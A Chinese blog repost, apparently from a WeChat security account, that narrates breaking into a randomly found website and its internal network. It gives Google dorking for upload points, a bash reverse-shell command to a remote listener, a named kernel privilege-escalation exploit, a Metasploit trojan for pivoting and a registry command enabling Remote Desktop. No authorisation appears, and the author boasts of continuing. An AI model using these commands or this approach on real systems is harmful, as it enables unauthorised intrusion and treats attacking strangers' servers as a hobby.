|
以前收藏的一篇文章,但已经找不到原作者是谁了,所以没有注明来源,如有侵权,还请联系删除!
0x01 突破边界拿下shell
周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。
inurl:xxx.xxx.xxx/upload
0x02 反弹shell&提权
Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。
需要一台公网服务器,使用命令bash -i >& /dev/tcp/your ip/1234 0>&1,公网服务器使用命令nc -lvp 1234监听1234端口。
现在shell已经反弹出来了,使用id命令查看当前权限,发现仅为Apache,使用-uname -a 查看内核版本,发现服务器内核版本为2.6.31.5-127.fc12.1686。
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
0x03 横向渗透撸内网
发现目标主机有内网环境,个人比较喜欢用msf,于是生成了个msf木马上传执行获取到一个meterpreter shell。
这里需要注意的是生成木马时LHOST填你的服务器公网ip,设置msf监听时LHOST需要填你服务器的内网ip。
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
0x04 写在后面的话
第一次从外网渗透到内网,盯了三天终于撸下一台,感觉这个内网还有的撸,有时间再继续搞。
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推 荐 阅 读
欢 迎 私 下 骚 扰
原文始发于微信公众号(潇湘信安):记一次渗透测试实战记录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论